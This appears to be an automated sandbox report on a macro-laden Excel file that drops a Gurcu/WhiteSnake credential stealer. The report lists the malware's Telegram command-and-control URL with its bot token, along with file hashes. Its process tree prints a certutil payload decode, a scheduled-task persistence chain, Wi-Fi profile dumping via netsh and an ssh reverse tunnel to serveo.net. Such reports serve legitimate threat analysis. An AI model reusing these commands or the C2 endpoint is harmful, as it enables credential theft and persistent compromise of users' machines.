Analysis

  • max time kernel
    137s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-10-2024 10:57

General

  • Target

    e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm

  • Size

    201KB

  • MD5

    c595d96742a883a534ed1ca1f0d279d1

  • SHA1

    c465daa9e5bd998ef39c59f80f82f79cc75ce659

  • SHA256

    e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de

  • SHA512

    142506545388000aad69fbd9dabd62cb80b75fceb83cb8e31747a1c2de5495327fff2d4a6badabc691fb68df2361aa9f0a5adf969cf3f688b1f89959ca04538b

  • SSDEEP

    6144:+pQEXBxlv/9mIRzcZcD50SQBpDb8FJA7xqSWbLsE4D:+XBrv/AIRA6D5nQB5b8FJA7xGfsVD

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7761583635:AAGKfAalgYsBotuxvw8mb6qVnPPY4_337uo/sendMessage?chat_id=972119615

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Payload decoded via CertUtil.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3692
    • C:\Windows\System32\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7 C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
      2⤵
      • Process spawned unexpected child process
      • Deobfuscate/Decode Files or Information
      PID:1140
    • C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe
      "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:2568
          • C:\Windows\system32\timeout.exe
            timeout /t 3
            4⤵
            • Delays execution with timeout.exe
            PID:5004
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1000
          • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
            "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"
            4⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            • outlook_office_path
            • outlook_win_path
            PID:3812
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
              5⤵
              • System Network Configuration Discovery: Wi-Fi Discovery
              • Suspicious use of WriteProcessMemory
              PID:3024
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:4484
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3708
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  6⤵
                    PID:2440
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4704
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    6⤵
                      PID:3192
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      6⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2064
                    • C:\Windows\system32\findstr.exe
                      findstr "SSID BSSID Signal"
                      6⤵
                        PID:1432
                    • C:\Windows\System32\OpenSSH\ssh.exe
                      "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3068 serveo.net
                      5⤵
                        PID:3600
              • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
                C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
                1⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:3712
              • C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
                C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe
                1⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1828

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Of74e1e35dd903c3c23095278b7f18453a5.exe.log

                Filesize

                847B

                MD5

                3308a84a40841fab7dfec198b3c31af7

                SHA1

                4e7ab6336c0538be5dd7da529c0265b3b6523083

                SHA256

                169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                SHA512

                97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

              • C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe

                Filesize

                135KB

                MD5

                410bd9796a48df659618b405cdcedced

                SHA1

                b87887753569673a6a3ea8ad568e0174c214f1ff

                SHA256

                9c5701ef66f03629131a476381865069d0cf78bed20fab2725d04c2f9471af5f

                SHA512

                1441142e9ade59fcea06afa43033ead028c68f0b5d420ded9fbd4b2c6fdcdd16bb002a58a87a4d637c7df70e1a5d680367be2bd8cc24e6e7346247d3587c9f5e

              • C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7

                Filesize

                180KB

                MD5

                b2d32fe2797534b941688bc919d564fd

                SHA1

                7949b2d8e9e1d5c1e84618e10d61b615e0376676

                SHA256

                5331e34ca1acf5576ce551607ecf5bf4430078e08a02bd940bab501bcb62135c

                SHA512

                13b598897c35adfa09cf4664a20cf38bbde4968c2961691bff9e772c8ec6c5e97b241525fb39bffbeb02fa9bcde132897e3be3372c428d80529c89827bb70596

              • C:\Users\Admin\AppData\Local\csxe3bn6se\p.dat

                Filesize

                4B

                MD5

                f5496252609c43eb8a3d147ab9b9c006

                SHA1

                03f8cd2c9e12b97fed00427c6d66da173468a1f9

                SHA256

                e12868d1f3963e0e1129b3a6442b6d3d7d8e4eb7e27d34348b29523f0ae37748

                SHA512

                9caa41d81e9539b9584e310a8cbc6acfc0ada1ed953856ae1d3e75fc1891bf048ab1accf85788208080605f387e225d4c11452e93aa4a5c9fe96a24631e56a2f

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

                Filesize

                1KB

                MD5

                d95b6d405d530b8a81383dfd382cc1af

                SHA1

                79072d3de481abd26391c933f6b226b9fb4aa599

                SHA256

                795b2bac028fd471a5c2b0e4240e3cd1b3d220529b8c878c70053ff28b04d5e1

                SHA512

                c08c23d2de951a52f270e3b79fc51192b0e7f7631ff2089e68d2354e81ecb4d18114e445bd26acf08520ab0e7934ee34dbfedfe1d4b1bdf7eccad2619a305a8c

              • memory/2284-37-0x000001C43A8C0000-0x000001C43A8E8000-memory.dmp

                Filesize

                160KB

              • memory/3692-7-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

                Filesize

                64KB

              • memory/3692-25-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-15-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp

                Filesize

                64KB

              • memory/3692-16-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp

                Filesize

                64KB

              • memory/3692-14-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-13-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-12-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-11-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-10-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-9-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-8-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-0-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

                Filesize

                64KB

              • memory/3692-26-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-27-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-5-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

                Filesize

                64KB

              • memory/3692-6-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-4-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-2-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

                Filesize

                64KB

              • memory/3692-46-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-47-0x00007FF8B5C2D000-0x00007FF8B5C2E000-memory.dmp

                Filesize

                4KB

              • memory/3692-53-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

                Filesize

                2.0MB

              • memory/3692-3-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

                Filesize

                64KB

              • memory/3692-1-0x00007FF8B5C2D000-0x00007FF8B5C2E000-memory.dmp

                Filesize

                4KB